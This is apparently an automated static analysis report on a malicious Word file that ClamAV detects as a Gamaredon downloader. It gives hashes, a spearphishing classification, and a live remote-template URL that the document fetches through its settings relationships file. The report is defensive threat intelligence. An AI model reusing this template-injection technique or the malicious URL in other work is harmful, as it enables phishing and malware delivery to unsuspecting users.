Malicious Office (OOXML) / .DOC — malware analysis report

Static analysis result for SHA-256 5c20d1f0c60a10e7…

MALICIOUS

Office (OOXML) / .DOC

36.5 KB Created: 2020-02-25 05:41:00 UTC Authoring application: Microsoft Office Word 15.0000
MD5: 378c0fe6610d9afbc8c9346d50589966 SHA-1: 3c5051115164c4e31cd965304f8fc8cdff4d1e88 SHA-256: 5c20d1f0c60a10e7d656c1a3198554356c4ebe5a801d356fd2150e29f182ede1
122 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment

The file is detected as a downloader by ClamAV and exhibits characteristics of remote template injection and external relationships pointing to a malicious URL. The document body, disguised as a request for public information, is a social engineering lure to trick the user into interacting with the malicious template. The presence of VBA macros (implied by OOXML heuristics) suggests the execution of Visual Basic scripts to facilitate the download.

Heuristics 4

  • ClamAV: Doc.Downloader.Gamaredon-9966166-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Gamaredon-9966166-1
  • Remote template injection high OOXML_REMOTE_TEMPLATE
    Document references a remote template URL (http://tomond.ru/VZ/select/basis/never.dot) — a common remote-template-injection vector used by Hancitor, Emotet and many phishing campaigns. Word can fetch and apply the remote template; macros in that template may execute depending on Office policy and trust state.
  • External relationship medium OOXML_EXTERNAL_REL
    External target in word/_rels/settings.xml.rels: http://tomond.ru/VZ/select/basis/never.dot
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://tomond.ru/VZ/select/basis/never.dot
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Open this report in the interactive analyzer, or submit your own file for analysis.